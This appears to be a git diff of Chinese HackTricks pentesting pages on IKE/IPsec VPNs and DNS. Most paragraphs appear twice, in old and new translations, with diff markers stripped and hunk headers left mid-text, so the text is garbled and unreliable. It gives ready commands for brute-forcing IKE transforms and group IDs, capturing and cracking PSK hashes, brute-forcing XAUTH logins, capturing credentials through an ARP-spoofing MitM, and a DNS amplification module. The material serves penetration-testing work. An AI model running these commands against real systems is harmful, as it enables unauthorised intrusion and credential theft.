首先,您需要创建所有可能的变换:
```bash
for ENC in 1 2 3 4 5 6 7/128 7/192 7/256 8; do for HASH in 1 2 3 4 5 6; do for AUTH in 1 2 3 4 5 6 7 8 64221 64222 64223 64224 65001 65002 65003 65004 65005 65006 65007 65008 65009 65010; do for GROUP in 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18; do echo "--trans=$ENC,$HASH,$AUTH,$GROUP" >> ike-dict.txt ;done ;done ;done ;done
```
然后使用ike-scan对每个进行暴力破解这可能需要几分钟
然后使用 ike-scan 对每个进行暴力破解(这可能需要几分钟):
```bash
while read line; do (echo "Valid trans found: $line" && sudo ike-scan -M $line <IP>) | grep -B14 "1 returned handshake" | grep "Valid trans found" ; done < ike-dict.txt
```
如果暴力破解没有成功,也许服务器甚至对有效的转换也没有握手而直接响应。那么,你可以尝试相同的暴力破解,但使用侵略模式
如果暴力破解没有成功,可能服务器即使对有效的变换也没有进行握手响应。那么,你可以尝试使用攻击模式进行相同的暴力破解
```bash
while read line; do (echo "Valid trans found: $line" && ike-scan -M --aggressive -P handshake.txt $line <IP>) | grep -B7 "SA=" | grep "Valid trans found" ; done < ike-dict.txt
```
希望**有效的转换被回显**。\
您可以尝试使用[**iker.py**](https://github.com/isaudits/scripts/blob/master/iker.py)进行**相同的攻击**。\
您还可以尝试使用[ikeforce](https://github.com/SpiderLabs/ikeforce)来暴力破解转换:
您可以尝试使用 [**iker.py**](https://github.com/isaudits/scripts/blob/master/iker.py)进行**相同的攻击**。\
您还可以尝试使用 [**ikeforce**](https://github.com/SpiderLabs/ikeforce)进行暴力破解转换:
```bash
./ikeforce.py <IP> # No parameters are required for scan -h for additional help
```
![](<../.gitbook/assets/image (617).png>)
**DH Group: 14 = 2048-bit MODP**和**15 = 3072-bit**\
**2 = HMAC-SHA = SHA1 (在这种情况下)。`--trans`格式为 $Enc,$Hash,$Auth,$DH**
**DH 组14 = 2048位 MODP****15 = 3072位**\
**2 = HMAC-SHA = SHA1(在这种情况下)。`--trans` 格式为 $Enc,$Hash,$Auth,$DH**
思科建议避免使用 DH 组 1 和 2因为它们不够强大。专家认为**拥有大量资源的国家可以轻松破解**使用这些弱组的数据加密。这是通过使用一种特殊方法来准备快速破解代码来实现的。尽管设置这种方法需要花费大量资金,但它使这些强大的国家能够实时阅读使用不够强大的组(如 1,024 位或更小)的加密数据
思科表示应避免使用 DH 组 1 和 2因为它们不够强大。专家认为**资源丰富的国家可以轻易破解使用这些弱组的数据加密**。这通过使用一种特殊方法来实现,使它们能够快速破解代码。尽管设置这种方法的成本很高,但它允许这些强大的国家实时读取加密数据,如果使用的是不强的组(如 1,024 位或更小)
### 服务器指纹识别
然后,您可以使用 ike-scan 尝试**发现设备的供应商**。该工具发送初始提议并停止重播。然后,它将**分析**从服务器接收的消息与匹配响应模式之间的**时间**差异,渗透测试人员可以成功识别 VPN 网关供应商。此外,一些 VPN 服务器将使用带有 IKE 的可选**供应商 ID (VID) 负载**。
然后,您可以使用 ike-scan 尝试 **发现设备的供应商**。该工具发送初始提案并停止重放。然后,它将 **分析** 从服务器接收到的 **消息** 与匹配响应模式之间的 **时间** 差异,渗透测试者可以成功识别 VPN 网关供应商。此外,一些 VPN 服务器将使用可选**供应商 ID (VID) 负载** 与 IKE
**如有需要,请指定有效的转换**(使用 --trans
@ -121,50 +123,54 @@ IP Address No. Recv time Delta Time
Ending ike-scan 1.9: 1 hosts scanned in 84.080 seconds (0.01 hosts/sec). 1 returned handshake; 0 returned notify
```
这也可以通过 nmap 脚本 _**ike-version**_ 实现。
这也可以通过 nmap 脚本 _**ike-version**_ 实现。
## 查找正确的 ID组名
为了被允许捕获哈希值,您需要一个支持主动模式和正确 ID组名的有效转换。您可能不知道有效的组名因此您将不得不使用暴力破解来尝试。\
为了能够捕获哈希,您需要一个支持 Aggressive 模式的有效转换和正确的 ID组名。您可能不知道有效的组名因此您需要进行暴力破解。\
为此,我建议您使用 2 种方法:
### 使用 ike-scan 进行 ID 暴力破解
### 使用 ike-scan 进行暴力破解 ID
首先尝试使用一个虚假的 ID 发出请求,尝试收集哈希值("-P"
首先尝试使用假 ID 发出请求,试图收集哈希(“-P”
```bash
ike-scan -P -M -A -n fakeID <IP>
```
如果**没有返回哈希值**,那么可能这种暴力破解方法会奏效。**如果返回了某个哈希值这意味着将为一个虚假的ID发送一个虚假的哈希值因此这种方法不可靠**用于暴力破解ID。例如可能会返回一个虚假的哈希值在现代版本中会发生):
如果**没有返回哈希**,那么这种暴力破解的方法可能会有效。**如果返回了一些哈希这意味着将会为一个假ID发送一个假哈希因此这种方法不可靠**来暴力破解ID。例如可能会返回一个假哈希这在现代版本中发生):
![](<../.gitbook/assets/image (917).png>)
正如我所说如果没有返回哈希值那么你应该尝试使用ike-scan来暴力破解常见的组名。
是如果如我所说没有返回哈希那么你应该尝试使用ike-scan暴力破解常见的组名。
这个脚本**将尝试暴力破解可能的ID**,并将返回进行握手验证的ID这将是一个有效的组名
这个脚本**将尝试暴力破解可能的ID**,并返回有效握手的ID这将是一个有效的组名
如果你发现了特定的转换请将其添加到ike-scan命令中。如果你发现了几种转换请随时添加一个新的循环来尝试它们直到其中一个正常工作为止)。
如果你发现了特定的变换请将其添加到ike-scan命令中。如果你发现了多个变换可以自由添加一个新的循环来尝试它们所有你应该尝试它们所有直到其中一个正常工作)。
你可以使用[ikeforce的字典](https://github.com/SpiderLabs/ikeforce/blob/master/wordlists/groupnames.dic)或[seclists中的字典](https://github.com/danielmiessler/SecLists/blob/master/Miscellaneous/ike-groupid.txt)来暴力破解常见的组名:
```bash
while read line; do (echo "Found ID: $line" && sudo ike-scan -M -A -n $line <IP>) | grep -B14 "1 returned handshake" | grep "Found ID:"; done < /usr/share/wordlists/external/SecLists/Miscellaneous/ike-groupid.txt
```
### 使用Iker进行ID暴力破解
Or use this dict (is a combination of the other 2 dicts without repetitions):
[**iker.py**](https://github.com/isaudits/scripts/blob/master/iker.py) 也使用 **ike-scan** 来暴力破解可能的组名。它遵循自己的方法来 **根据ike-scan的输出找到有效的ID**
{% file src="../.gitbook/assets/vpnIDs.txt" %}
### 使用ikeforce进行ID暴力破解
### 使用 Iker 进行 ID 暴力破解
[**ikeforce.py**](https://github.com/SpiderLabs/ikeforce) 是一个工具,可以用来 **暴力破解ID**。该工具将 **尝试利用不同的漏洞**,这些漏洞可以用来 **区分有效和无效的ID**可能会有误报和漏报这就是为什么我更喜欢在可能的情况下使用ike-scan方法
[**iker.py**](https://github.com/isaudits/scripts/blob/master/iker.py) 也使用 **ike-scan** 来暴力破解可能的组名。它遵循自己的方法来 **根据 ike-scan 的输出找到有效的 ID**
默认情况下,**ikeforce** 会在开始时发送一些随机的ID以检查服务器的行为并确定要使用的策略。
### 使用 ikeforce 进行 ID 暴力破解
* **第一种方法** 是通过 **搜索** Cisco系统的 **Dead Peer Detection DPD** 信息来暴力破解组名(只有在组名正确时服务器才会回复此信息)。
* 可用的 **第二种方法****检查每次尝试发送的响应数量**因为有时在使用正确的ID时会发送更多数据包。
* **第三种方法** 是在响应中 **搜索"INVALID-ID-INFORMATION"** 来识别不正确的ID。
* 最后,如果服务器对检查没有任何回复,**ikeforce** 将尝试暴力破解服务器并检查当发送正确的ID时服务器是否会回复一些数据包。\
显然暴力破解ID的目的是在获得有效ID后获取 **PSK**。然后,使用 **ID****PSK**您将需要暴力破解XAUTH如果启用
[**ikeforce.py**](https://github.com/SpiderLabs/ikeforce) 是一个可以用来 **暴力破解 ID 的工具**。该工具将 **尝试利用不同的漏洞**,以便 **区分有效 ID 和无效 ID**(可能会有误报和漏报,这就是为什么我更喜欢在可能的情况下使用 ike-scan 方法)。
如果您发现了特定的转换请将其添加到ikeforce命令中。如果您发现了多个转换请随时添加一个新的循环来尝试它们您应该尝试它们所有直到其中一个正常工作为止
默认情况下,**ikeforce** 在开始时会发送一些随机 ID 来检查服务器的行为并确定使用的策略。
* **第一种方法**是通过 **搜索** Cisco 系统的 **死对等检测 DPD** 信息来暴力破解组名(只有在组名正确时,服务器才会回复此信息)。
* **第二种方法**是 **检查每次尝试发送的响应数量**,因为有时使用正确 ID 时会发送更多数据包。
* **第三种方法**是 **搜索对无效 ID 的响应中的 "INVALID-ID-INFORMATION"**
* 最后,如果服务器对检查没有任何回复,**ikeforce** 将尝试暴力破解服务器,并检查在发送正确 ID 时服务器是否回复某些数据包。\
显然,暴力破解 ID 的目标是获取 **PSK**,当你有一个有效的 ID 时。然后,使用 **ID****PSK** 你将需要暴力破解 XAUTH如果启用的话
如果你发现了特定的转换,请将其添加到 ikeforce 命令中。如果你发现了多个转换,可以随意添加一个新循环来尝试它们所有(你应该尝试所有,直到其中一个正常工作)。
```bash
git clone https://github.com/SpiderLabs/ikeforce.git
pip install 'pyopenssl==17.2.0' #It is old and need this version of the library
@ -173,51 +179,53 @@ pip install 'pyopenssl==17.2.0' #It is old and need this version of the library
```bash
./ikeforce.py <IP> -e -w ./wordlists/groupnames.dic
```
### 嗅探ID
### Sniffing ID
(来自书籍**网络安全评估:了解您的网络**还可以通过嗅探VPN客户端和服务器之间的连接来获取有效的用户名因为包含客户端ID的第一个主动模式数据包是明文发送的
(来自书籍 **Network Security Assessment: Know Your Network**): 通过嗅探VPN客户端和服务器之间的连接也可以获得有效的用户名因为包含客户端ID的第一个攻击模式数据包是以明文发送的。
![](<../.gitbook/assets/image (891).png>)
## 捕获和破解哈希
## Capturing & cracking the hash
最后,如果您找到了一个**有效的转换**和**组名**,并且**允许主动模式**,那么您可以非常容易地获取可破解的哈希:
最后,如果您找到了 **有效的转换****组名**,并且 **允许攻击模式**,那么您可以非常轻松地获取可破解的哈希:
```bash
ike-scan -M -A -n <ID> --pskcrack=hash.txt <IP> #If aggressive mode is supported and you know the id, you can get the hash of the passwor
```
哈希将保存在 _hash.txt_ 中。
您可以使用 **psk-crack**、**john**(使用 [**ikescan2john.py**](https://github.com/truongkma/ctf-tools/blob/master/John/run/ikescan2john.py))和 **hashcat****破解** 这个哈希:
您可以使用 **psk-crack**、**john**(使用 [**ikescan2john.py**](https://github.com/truongkma/ctf-tools/blob/master/John/run/ikescan2john.py))和 **hashcat****crack** 哈希:
```bash
psk-crack -d <Wordlist_path> psk.txt
```
## **XAuth**
**Aggressive mode IKE**结合**预共享密钥 (PSK)**通常用于**群组认证**目的。这种方法通过**XAuth (扩展认证)**进行增强,引入了额外的**用户认证**层。这种认证通常利用**Microsoft Active Directory**、**RADIUS**或类似系统的服务
**攻击模式 IKE** 结合 **预共享密钥 (PSK)** 通常用于 **组认证** 目的。此方法通过 **XAuth (扩展认证)** 进行增强,后者引入了额外的 **用户认证** 层。此类认证通常利用 **Microsoft Active Directory**、**RADIUS** 或类似系统
转向**IKEv2**,观察到一个显著的变化,即使用**EAP (可扩展认证协议)**代替**XAuth**来对用户进行认证。这一变化突显了安全通信协议中认证实践的演变。
转向 **IKEv2** 时,观察到一个显著的变化,即使用 **EAP (可扩展认证协议)** 代替 **XAuth** 进行用户认证。这一变化强调了安全通信协议中认证实践的演变。
### 本地网络中间人攻击以捕获凭据
### 本地网络 MitM 捕获凭证
因此,您可以使用 _fiked_ 捕获登录数据,并查看是否存在任何默认用户名 (您需要将 IKE 流量重定向到 `fiked` 以进行嗅探,这可以通过 ARP 欺骗来完成[更多信息](https://opensourceforu.com/2012/01/ipsec-vpn-penetration-testing-backtrack-tools/))。Fiked 将充当 VPN 终端点,并捕获 XAuth 凭据
因此,您可以使用 _fiked_ 捕获登录数据,并查看是否有任何默认用户名(您需要将 IKE 流量重定向到 `fiked` 进行嗅探,这可以通过 ARP 欺骗实现[更多信息](https://opensourceforu.com/2012/01/ipsec-vpn-penetration-testing-backtrack-tools/)。Fiked 将充当 VPN 端点并捕获 XAuth 凭证
```bash
fiked -g <IP> -k testgroup:secretkey -l output.txt -d
```
### 使用 IPSec 尝试进行中间人攻击,并阻止所有流量访问端口 500如果 IPSec 隧道无法建立,也许流量将以明文形式发送。
同时使用IPSec尝试进行中间人攻击并阻止所有流量到端口500如果无法建立IPSec隧道流量可能会以明文发送。
### 使用 ikeforce 对 XAUTH 用户名和密码进行暴力破解
### 使用ikeforce暴力破解XAUTH用户名和密码
**XAUTH** 进行暴力破解(当你知道一个有效的组名 **id****psk** 时),你可以使用一个用户名或用户名列表以及一个密码列表:
暴力破解**XAUTH**(当你知道一个有效的组名**id**和**psk**时),你可以使用一个用户名或用户名列表以及一个密码列表:
```bash
./ikeforce.py <IP> -b -i <group_id> -u <username> -k <PSK> -w <passwords.txt> [-s 1]
```
这样ikeforce 将尝试使用每个用户名:密码组合进行连接。
这样ikeforce将尝试使用每个用户名:密码组合进行连接。
## 使用 IPSEC VPN 进行身份验证
如果您找到一个或多个有效的变换,只需像之前的步骤一样使用它们。
在 Kali 中,**VPNC** 用于建立 IPsec 隧道。**配置文件** 必须位于目录 `/etc/vpnc/` 中。您可以使用命令 _**vpnc**_ 来启动这些配置文件。
## 使用IPSEC VPN进行身份验证
以下命令和配置说明了使用 VPNC 建立 VPN 连接的过程:
在Kali中**VPNC**用于建立IPsec隧道。**配置文件**必须位于目录`/etc/vpnc/`中。您可以使用命令_**vpnc**_来启动这些配置文件。
以下命令和配置说明了使用VPNC设置VPN连接的过程
```bash
root@system:~# cat > /etc/vpnc/samplevpn.conf << STOP
IPSec gateway [VPN_GATEWAY_IP]
@ -231,43 +239,45 @@ root@system:~# vpnc samplevpn
VPNC started in background (pid: [PID])...
root@system:~# ifconfig tun0
```
这个设置中:
设置中:
- 用 VPN 网关的实际 IP 地址替换 `[VPN_GATEWAY_IP]`
- 用 VPN 连接的标识符替换 `[VPN_CONNECTION_ID]`
- 用 VPN 的组密码替换 `[VPN_GROUP_SECRET]`
- 用 VPN 认证凭据替换 `[VPN_USERNAME]``[VPN_PASSWORD]`
- `[PID]` 表示 `vpnc` 启动时将分配的进程 ID。
* 用 VPN 网关的实际 IP 地址替换 `[VPN_GATEWAY_IP]`
* 用 VPN 连接的标识符替换 `[VPN_CONNECTION_ID]`
* 用 VPN 的组密钥替换 `[VPN_GROUP_SECRET]`
* 用 VPN 身份验证凭据替换 `[VPN_USERNAME]``[VPN_PASSWORD]`
* `[PID]` 表示在 `vpnc` 启动时将分配的进程 ID。
确保在配置 VPN 时使用实际安全值替换占位符。
确保在配置 VPN 时使用实际的、安全替换占位符。
## 参考资料
- [PSK 破解论文](http://www.ernw.de/download/pskattack.pdf)
- [SecurityFocus Infocus](http://www.securityfocus.com/infocus/1821)
- [扫描 VPN 实现](http://www.radarhack.com/dir/papers/Scanning\_ike\_with\_ikescan.pdf)
- 《网络安全评估第三版》
* [PSK 破解论文](http://www.ernw.de/download/pskattack.pdf)
* [SecurityFocus 深度分析](http://www.securityfocus.com/infocus/1821)
* [扫描 VPN 实现](http://www.radarhack.com/dir/papers/Scanning\_ike\_with\_ikescan.pdf)
* 网络安全评估 第三版
## Shodan
- `port:500 IKE`
* `port:500 IKE`
**Try Hard Security Group**
<figure><img src="../.gitbook/assets/telegram-cloud-document-1-5159108904864449420.jpg" alt=""><figcaption></figcaption></figure>
{% embed url="https://discord.gg/tryhardsecurity" %}
{% hint style="success" %}
学习与实践 AWS 黑客技术:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks 培训 AWS 红队专家 (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
学习与实践 GCP 黑客技术:<img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks 培训 GCP 红队专家 (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>从零开始学习 AWS 黑客技术,成为专家</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTEHackTricks AWS 红队专家)</strong></a><strong></strong></summary>
<summary>支持 HackTricks</summary>
支持 HackTricks 的其他方式:
- 如果您想在 HackTricks 中看到您的公司广告或下载 HackTricks 的 PDF请查看[**订阅计划**](https://github.com/sponsors/carlospolop)
- 获取[**官方 PEASS & HackTricks 商品**](https://peass.creator-spring.com)
- 探索[**PEASS 家族**](https://opensea.io/collection/the-peass-family),我们的独家[**NFT**](https://opensea.io/collection/the-peass-family)收藏品
- **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**telegram 群组**](https://t.me/peass) 或在 **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live) 上 **关注** 我们。
- 通过向 [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github 仓库提交 PR 来分享您的黑客技巧。
* 查看 [**订阅计划**](https://github.com/sponsors/carlospolop)!
* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**Telegram 群组**](https://t.me/peass) 或 **关注** 我们的 **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **通过向** [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub 仓库提交 PR 来分享黑客技巧。
</details>
{% endhint %}
</details>
{% endhint %}

126
network-services-pentesting/pentesting-dns.md
View file

@ -1,28 +1,29 @@
# 53 - DNS 渗透测试
# 53 - Pentesting DNS
{% hint style="success" %}
学习与实践 AWS 黑客技术:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks 培训 AWS 红队专家 (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
学习与实践 GCP 黑客技术:<img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks 培训 GCP 红队专家 (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>从零开始学习 AWS 黑客技术,成为专家</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTEHackTricks AWS 红队专家)</strong></a><strong></strong></summary>
<summary>支持 HackTricks</summary>
支持 HackTricks 的其他方式:
* 如果您想看到您的**公司在 HackTricks 中做广告**或**下载 PDF 版的 HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
* 获取[**官方 PEASS & HackTricks 商品**](https://peass.creator-spring.com)
* 探索[**PEASS 家族**](https://opensea.io/collection/the-peass-family),我们的独家[**NFTs**](https://opensea.io/collection/the-peass-family)
* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**电报群组**](https://t.me/peass) 或在 **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)** 上关注**我们。
* 通过向 [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github 仓库提交 PR 来分享您的黑客技巧。
* 查看 [**订阅计划**](https://github.com/sponsors/carlospolop)!
* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**Telegram 群组**](https://t.me/peass) 或 **关注** 我们的 **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **通过向** [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub 仓库提交 PR 分享黑客技巧。
</details>
{% endhint %}
<figure><img src="../.gitbook/assets/image (14) (1).png" alt=""><figcaption></figcaption></figure>
**即时提供的漏洞评估和渗透测试设置**。使用 20 多种工具和功能从侦察到报告运行完整的渗透测试。我们不取代渗透测试人员 - 我们开发定制工具、检测和利用模块,让他们有更多时间深入挖掘、弹出 shell 并享受乐趣。
**即时可用的漏洞评估与渗透测试设置**。从任何地方运行完整的渗透测试,使用 20 多种工具和功能,从侦察到报告。我们不替代渗透测试人员 - 我们开发自定义工具、检测和利用模块,以便让他们有更多时间深入挖掘、获取 shell 并享受乐趣。
{% embed url="https://pentest-tools.com/" %}
## **基本信息**
**域名系统DNS** 充当互联网的目录,允许用户通过易记的域名(如 google.com 或 facebook.com访问网站而不是数字的互联网协议IP地址。通过将域名翻译为 IP 地址DNS 确保 Web 浏览器可以快速加载互联网资源,简化我们在线世界中的导航方式。
**域名系统 (DNS)** 作为互联网的目录,使用户能够通过 **易于记忆的域名** 访问网站,如 google.com 或 facebook.com而不是数字互联网协议 (IP) 地址。通过将域名转换为 IP 地址DNS 确保网页浏览器能够快速加载互联网资源,简化了我们在在线世界中的导航方式。
**默认端口:** 53
```
@ -31,39 +32,39 @@ PORT STATE SERVICE REASON
5353/udp open zeroconf udp-response
53/udp open domain Microsoft DNS 6.1.7601 (1DB15D39) (Windows Server 2008 R2 SP1)
```
### 不同的DNS服务器
### 不同的 DNS 服务器
* **DNS根服务器**这些位于DNS层次结构的顶部管理顶级域并仅在较低级别服务器不响应时介入。互联网名称与数字分配机构**ICANN**监督它们的运作全球共有13个
* **权威名服务器**:这些服务器对其指定区域的查询有最终决定权,提供明确的答案。如果它们无法提供响应,查询将升级到根服务器。
* **非权威域名服务器**这些服务器没有对DNS区域的所有权它们通过查询其他服务器收集域信息。
* **缓存DNS服务器**:这种类型的服务器会记住先前查询的答案一段时间,以加快未来请求的响应时间,缓存持续时间由权威服务器决定。
* **转发服务器**扮演简单角色的转发服务器只是将查询转发到另一个服务器。
* **解析器**:集成在计算机或路由器中,解析器在本地执行名称解析,不被视为具有权威
* **DNS 根服务器**:这些服务器位于 DNS 层次结构的顶部,管理顶级域,仅在下级服务器未响应时介入。互联网名称与数字分配公司(**ICANN**)负责其运营,全球共有 13 台
* **权威服务器**:这些服务器对其指定区域的查询有最终决定权,提供明确的答案。如果它们无法提供响应,查询将升级到根服务器。
* **非权威名称服务器**:这些服务器不拥有 DNS 区域,通过向其他服务器查询来收集域信息。
* **缓存 DNS 服务器**:这种类型的服务器会在设定时间内记住先前查询的答案,以加快未来请求的响应时间,缓存持续时间由权威服务器决定。
* **转发服务器**转发服务器的角色简单,仅将查询转发到另一台服务器。
* **解析器**:集成在计算机或路由器中,解析器在本地执行名称解析,不被视为权威。
## 枚举
### **横幅抓取**
DNS中没有横幅,但您可以使用`version.bind. CHAOS TXT`的魔术查询来抓取大多数BIND域名服务器的信息。\
您可以使用`dig`执行此查询:
DNS 中没有横幅,但您可以抓取 `version.bind. CHAOS TXT` 的魔法查询,这在大多数 BIND 名称服务器上都有效。\
您可以使用 `dig` 执行此查询:
```bash
dig version.bind CHAOS TXT @DNS
```
此外,工具[`fpdns`](https://github.com/kirei/fpdns)也可以对服务器进行指纹识别。
此外,工具 [`fpdns`](https://github.com/kirei/fpdns) 也可以指纹识别服务器
还可以使用**nmap**脚本获取横幅:
还可以使用 **nmap** 脚本抓取横幅:
```
--script dns-nsid
```
### **任何记录**
**ANY** 记录将要求 DNS 服务器返回其愿意披露的所有可用条目
记录 **ANY** 将请求 DNS 服务器 **返回** 所有可用的 **条目**,这些条目是 **它愿意披露**
```bash
dig any victim.com @<DNS_IP>
```
### **区域传**
### **区域传**
该过程简称为`异步完整传输区域``AXFR`)。
此过程缩写为 `Asynchronous Full Transfer Zone` (`AXFR`).
```bash
dig axfr @<DNS_IP> #Try zone transfer without domain
dig axfr @<DNS_IP> <DOMAIN> #Try zone transfer guessing the domain
@ -95,7 +96,7 @@ nslookup
> 127.0.0.1 #Reverse lookup of 127.0.0.1, maybe...
> <IP_MACHINE> #Reverse lookup of a machine, maybe...
```
### 有用的metasploit模块
### 有用的 metasploit 模块
```bash
auxiliary/gather/enum_dns #Perform enumeration actions
```
@ -104,7 +105,7 @@ auxiliary/gather/enum_dns #Perform enumeration actions
#Perform enumeration actions
nmap -n --script "(default and *dns*) or fcrdns or dns-srv-enum or dns-random-txid or dns-random-srcport" <IP>
```
### DNS - 反向 BF
### DNS - 反向暴力破解
```bash
dnsrecon -r 127.0.0.0/24 -n <IP_DNS> #DNS reverse of all of the addresses
dnsrecon -r 127.0.1.0/24 -n <IP_DNS> #DNS reverse of all of the addresses
@ -112,12 +113,12 @@ dnsrecon -r <IP_DNS>/24 -n <IP_DNS> #DNS reverse of all of the addresses
dnsrecon -d active.htb -a -n <IP_DNS> #Zone transfer
```
{% hint style="info" %}
如果您能找到解析为内部IP地址的子域名您应该尝试对该IP范围进行反向DNS暴力破解向该域的NS发出请求
如果您能够找到解析到内部IP地址的子域名您应该尝试对该IP范围的域名的NS进行反向DNS暴力破解。
{% endhint %}
另一个工具可实现此目的[https://github.com/amine7536/reverse-scan](https://github.com/amine7536/reverse-scan)
另一个工具:[https://github.com/amine7536/reverse-scan](https://github.com/amine7536/reverse-scan)
您可以查询反向IP范围至[https://bgp.he.net/net/205.166.76.0/24#\_dns](https://bgp.he.net/net/205.166.76.0/24#\_dns)(此工具在BGP方面也很有帮助
您可以查询反向IP范围到[https://bgp.he.net/net/205.166.76.0/24#\_dns](https://bgp.he.net/net/205.166.76.0/24#\_dns)(这个工具在BGP方面也很有帮助
### DNS - 子域名暴力破解
```bash
@ -125,7 +126,7 @@ dnsenum --dnsserver <IP_DNS> --enum -p 0 -s 0 -o subdomains.txt -f subdomains-10
dnsrecon -D subdomains-1000.txt -d <DOMAIN> -n <IP_DNS>
dnscan -d <domain> -r -w subdomains-1000.txt #Bruteforce subdomains in recursive way, https://github.com/rbsec/dnscan
```
### Active Directory 服务器
### 活动目录服务器
```bash
dig -t _gc._tcp.lab.domain.com
dig -t _ldap._tcp.lab.domain.com
@ -137,8 +138,6 @@ nslookup -type=srv _kerberos._tcp.domain.com
nmap --script dns-srv-enum --script-args "dns-srv-enum.domain='domain.com'"
```
### DNSSec
### DNSSec
```bash
#Query paypal subdomains to ns3.isc-sns.info
@ -146,7 +145,7 @@ nmap -sSU -p53 --script dns-nsec-enum --script-args dns-nsec-enum.domains=paypal
```
### IPv6
使用 "AAAA" 请求进行暴力破解,以收集子域的 IPv6 地址
使用“AAAA”请求进行暴力破解以收集子域名的IPv6
```bash
dnsdict6 -s -t <domain>
```
@ -154,36 +153,36 @@ dnsdict6 -s -t <domain>
```bash
dnsrevenum6 pri.authdns.ripe.net 2001:67c:2e8::/48 #Will use the dns pri.authdns.ripe.net
```
### DNS递归DDoS
### DNS 递归 DDoS
如果**启用了DNS递归**,攻击者可以**伪造**UDP数据包中的**源**,以便使**DNS将响应发送到受害者服务器**。攻击者可以滥用**ANY**或**DNSSEC**记录类型,因为它们通常具有更大的响应。\
检查DNS是否支持**递归**的方法是查询一个域名,并**检查**响应中是否包含标志"ra"_递归可用_
如果 **DNS 递归已启用**,攻击者可以 **伪造** UDP 数据包中的 **源**,以使 **DNS 将响应发送到受害者服务器**。攻击者可以滥用 **ANY** **DNSSEC** 记录类型,因为它们通常具有更大的响应。\
检查 DNS 是否支持 **递归** 的方法是查询一个域名并 **检查** 响应中是否包含 **标志 "ra"** (_递归可用_)
```bash
dig google.com A @<IP>
```
**不可用**:
**不可用**
![](<../.gitbook/assets/image (123).png>)
**可用**:
**可用**
![](<../.gitbook/assets/image (146).png>)
<figure><img src="../.gitbook/assets/image (14) (1).png" alt=""><figcaption></figcaption></figure>
**即时提供漏洞评估和渗透测试设置**。从任何地方运行完整的渗透测试具有从侦察到报告的20多种工具和功能。我们不取代渗透测试人员 - 我们开发定制工具、检测和利用模块为他们节省一些时间深入挖掘弹出shell并享受乐趣。
**即时可用的漏洞评估和渗透测试设置**。从任何地方运行完整的渗透测试使用20多个工具和功能从侦察到报告。我们不替代渗透测试人员 - 我们开发自定义工具、检测和利用模块以便让他们有更多时间深入挖掘、获取shell并享受乐趣。
{% embed url="https://pentest-tools.com/" %}
### 发送到不存在账户的邮件
### 邮件发送至不存在的账户
通过检查由发送到目标域中无效地址的电子邮件触发的非投递通知NDN通常会披露有价值的内部网络详细信息
通过检查因发送到目标域内无效地址而触发的未送达通知NDN通常会泄露有价值的内部网络细节
提供的非投递报告包括以下信息:
提供的未送达报告包括以下信息:
- 生成服务器被识别为 `server.example.com`
- 返回了一个针对 `user@example.com` 的错误代码 `#550 5.1.1 RESOLVER.ADR.RecipNotFound; not found` 的失败通知
- 在原始消息头中披露了内部IP地址和主机名。
* 生成服务器被识别为 `server.example.com`
* 返回了 `user@example.com` 的失败通知,错误代码为 `#550 5.1.1 RESOLVER.ADR.RecipNotFound; not found`
* 原始消息头中泄露了内部IP地址和主机名。
```markdown
The original message headers were modified for anonymity and now present randomized data:
@ -217,19 +216,21 @@ host.conf
/etc/bind/named.conf.log
/etc/bind/*
```
在配置Bind服务器时的危险设置:
危险的 Bind 服务器配置设置:
| **选项** | **描述** |
| **选项** | **描述** |
| ----------------- | ------------------------------------------------------------------------------ |
| `allow-query` | 定义允许向DNS服务器发送请求的主机 |
| `allow-recursion` | 定义允许向DNS服务器发送递归请求的主机 |
| `allow-transfer` | 定义允许从DNS服务器接收区域传输的主机 |
| `allow-query` | 定义哪些主机被允许向 DNS 服务器发送请求。 |
| `allow-recursion` | 定义哪些主机被允许向 DNS 服务器发送递归请求。 |
| `allow-transfer` | 定义哪些主机被允许从 DNS 服务器接收区域传输。 |
| `zone-statistics` | 收集区域的统计数据。 |
## 参考资料
## 参考文献
* [https://www.myrasecurity.com/en/knowledge-hub/dns/](https://www.myrasecurity.com/en/knowledge-hub/dns/)
* 书籍:**Network Security Assessment第3版**
* 书籍:**网络安全评估 第3版**
## HackTricks 自动命令
```
Protocol_Name: DNS #Protocol Abbreviation if there is one.
Port_Number: 53 #Comma separated if there is more than one.
@ -284,20 +285,21 @@ Command: msfconsole -q -x 'use auxiliary/scanner/dns/dns_amp; set RHOSTS {IP}; s
```
<figure><img src="../.gitbook/assets/image (14) (1).png" alt=""><figcaption></figcaption></figure>
